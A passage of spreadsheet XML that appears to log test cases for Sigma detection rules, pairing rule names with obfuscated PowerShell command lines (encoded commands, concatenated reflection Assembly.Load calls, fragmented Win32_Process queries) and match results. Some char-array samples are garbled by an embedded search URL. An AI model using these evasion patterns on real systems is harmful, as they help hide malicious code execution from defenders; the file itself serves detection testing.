          <t>powershell.exe /E SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F1166" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1166" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1166" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1166" s="43" t="n"/>
      <c r="J1166" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1166" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1167" ht="15.75" customHeight="1" s="42">
      <c r="A1167" s="43" t="n"/>
      <c r="B1167" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1167" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1167" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1167" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$m = 'Load'; [Reflection.Assembly]::$m.Invoke($data)"</t>
        </is>
      </c>
      <c r="F1167" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1167" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1167" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1167" s="43" t="n"/>
      <c r="J1167" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1167" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1168" ht="15.75" customHeight="1" s="42">
      <c r="A1168" s="43" t="n"/>
      <c r="B1168" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1168" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1168" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1168" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$m = 'Load'; [Reflection.Assembly]::$m.Invoke($data)"</t>
        </is>
      </c>
      <c r="F1168" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1168" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1168" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1168" s="43" t="n"/>
      <c r="J1168" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1168" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1169" ht="15.75" customHeight="1" s="42">
      <c r="A1169" s="43" t="n"/>
      <c r="B1169" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1169" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1169" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1169" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "$m = 'Load'; [Reflection.Assembly]::$m.Invoke($data)"</t>
        </is>
      </c>
      <c r="F1169" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1169" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1169" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1169" s="43" t="n"/>
      <c r="J1169" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1169" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1170" ht="15.75" customHeight="1" s="42">
      <c r="A1170" s="43" t="n"/>
      <c r="B1170" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1170" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1170" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1170" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMand "$m = 'Load'; [Reflection.Assembly]::$m.Invoke($data)"</t>
        </is>
      </c>
      <c r="F1170" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1170" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1170" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1170" s="43" t="n"/>
      <c r="J1170" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1170" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1171" ht="15.75" customHeight="1" s="42">
      <c r="A1171" s="43" t="n"/>
      <c r="B1171" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1171" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1171" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1171" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAND "$m = 'Load'; [Reflection.Assembly]::$m.Invoke($data)"</t>
        </is>
      </c>
      <c r="F1171" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1171" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1171" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1171" s="43" t="n"/>
      <c r="J1171" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1171" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1172" ht="15.75" customHeight="1" s="42">
      <c r="A1172" s="43" t="n"/>
      <c r="B1172" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1172" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1172" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1172" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F1172" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1172" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1172" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1172" s="43" t="n"/>
      <c r="J1172" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1172" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1173" ht="15.75" customHeight="1" s="42">
      <c r="A1173" s="43" t="n"/>
      <c r="B1173" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1173" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1173" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1173" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F1173" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1173" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1173" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1173" s="43" t="n"/>
      <c r="J1173" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1173" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1174" ht="15.75" customHeight="1" s="42">
      <c r="A1174" s="43" t="n"/>
      <c r="B1174" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1174" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1174" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1174" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMManD "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F1174" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1174" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1174" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1174" s="43" t="n"/>
      <c r="J1174" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1174" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1175" ht="15.75" customHeight="1" s="42">
      <c r="A1175" s="43" t="n"/>
      <c r="B1175" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1175" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1175" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1175" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommaND "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F1175" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1175" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1175" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1175" s="43" t="n"/>
      <c r="J1175" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1175" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1176" ht="15.75" customHeight="1" s="42">
      <c r="A1176" s="43" t="n"/>
      <c r="B1176" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C1176" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D1176" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E1176" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -command "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F1176" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1176" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1176" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1176" s="43" t="n"/>
      <c r="J1176" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1176" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1177" ht="15.75" customHeight="1" s="42">
      <c r="A1177" s="43" t="n"/>
      <c r="B1177" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1177" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1177" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1177" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F1177" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1177" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1177" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1177" s="43" t="n"/>
      <c r="J1177" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1177" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1178" ht="15.75" customHeight="1" s="42">
      <c r="A1178" s="43" t="n"/>
      <c r="B1178" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1178" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1178" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1178" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmANd "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F1178" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1178" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1178" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1178" s="43" t="n"/>
      <c r="J1178" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1178" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1179" ht="15.75" customHeight="1" s="42">
      <c r="A1179" s="43" t="n"/>
      <c r="B1179" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1179" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1179" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1179" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAND "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F1179" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1179" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1179" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1179" s="43" t="n"/>
      <c r="J1179" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1179" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1180" ht="15.75" customHeight="1" s="42">
      <c r="A1180" s="43" t="n"/>
      <c r="B1180" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1180" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1180" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1180" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commANd "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F1180" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1180" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1180" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1180" s="43" t="n"/>
      <c r="J1180" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1180" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1181" ht="15.75" customHeight="1" s="42">
      <c r="A1181" s="43" t="n"/>
      <c r="B1181" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1181" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1181" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1181" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F1181" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1181" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1181" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1181" s="43" t="n"/>
      <c r="J1181" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1181" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1182" ht="15.75" customHeight="1" s="42">
      <c r="A1182" s="43" t="n"/>
      <c r="B1182" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1182" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1182" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1182" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmAND "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F1182" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1182" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1182" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1182" s="44" t="n"/>
      <c r="J1182" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1182" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1183" ht="15.75" customHeight="1" s="42">
      <c r="A1183" s="43" t="n"/>
      <c r="B1183" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1183" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1183" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1183" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commAnD "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F1183" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1183" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1183" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1183" s="43" t="n"/>
      <c r="J1183" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1183" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1184" ht="15.75" customHeight="1" s="42">
      <c r="A1184" s="43" t="n"/>
      <c r="B1184" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1184" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1184" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1184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184" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1184" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1184" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1184" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1184" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1184" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1185" ht="15.75" customHeight="1" s="42">
      <c r="A1185" s="43" t="n"/>
      <c r="B1185" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1185" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1185" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1185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185" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1185" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1185" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1185" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1185" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1185" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1186" ht="15.75" customHeight="1" s="42">
      <c r="A1186" s="43" t="n"/>
      <c r="B1186" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1186" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1186" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1186" s="4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F1186" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1186" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1186" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1186" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1186" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1186" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1187" ht="15.75" customHeight="1" s="42">
      <c r="A1187" s="43" t="n"/>
      <c r="B1187" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1187" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1187" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1187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187" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1187" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1187" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1187" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1187" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1187" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1188" ht="15.75" customHeight="1" s="42">
      <c r="A1188" s="43" t="n"/>
      <c r="B1188" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1188" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1188" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1188" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-WmiObject -Class ([char[]](https://www.google.com/search?q=87,105,110,51,50,95,80,114,111,99,101,115,115) -join '')"</t>
        </is>
      </c>
      <c r="F1188" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1188" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1188" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1188" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1188" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1188" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1189" ht="15.75" customHeight="1" s="42">
      <c r="A1189" s="43" t="n"/>
      <c r="B1189" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1189" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1189" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1189" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-WmiObject -Class ([char[]](https://www.google.com/search?q=87,105,110,51,50,95,80,114,111,99,101,115,115) -join '')"</t>
        </is>
      </c>
      <c r="F1189" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1189" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1189" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1189" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1189" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1189" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1190" ht="15.75" customHeight="1" s="42">
      <c r="A1190" s="43" t="n"/>
      <c r="B1190" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1190" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1190" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1190" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommanD "Get-WmiObject -Class ([char[]](https://www.google.com/search?q=87,105,110,51,50,95,80,114,111,99,101,115,115) -join '')"</t>
        </is>
      </c>
      <c r="F1190" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1190" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1190" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1190" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1190" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1190" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1191" ht="15.75" customHeight="1" s="42">
      <c r="A1191" s="43" t="n"/>
      <c r="B1191" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1191" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1191" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1191" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmAnd "Get-WmiObject -Class ([char[]](https://www.google.com/search?q=87,105,110,51,50,95,80,114,111,99,101,115,115) -join '')"</t>
        </is>
      </c>
      <c r="F1191" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1191" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1191" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1191" s="44" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1191" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1191" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1192" ht="15.75" customHeight="1" s="42">
      <c r="A1192" s="43" t="n"/>
      <c r="B1192" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1192" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1192" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1192" s="4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192" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1192" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1192" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1192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192" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1192" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1193" ht="15.75" customHeight="1" s="42">
      <c r="A1193" s="43" t="n"/>
      <c r="B1193" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1193" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1193" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1193" s="4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193" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1193" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1193" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I119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193" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1193" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1194" ht="15.75" customHeight="1" s="42">
      <c r="A1194" s="43" t="n"/>
      <c r="B1194" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
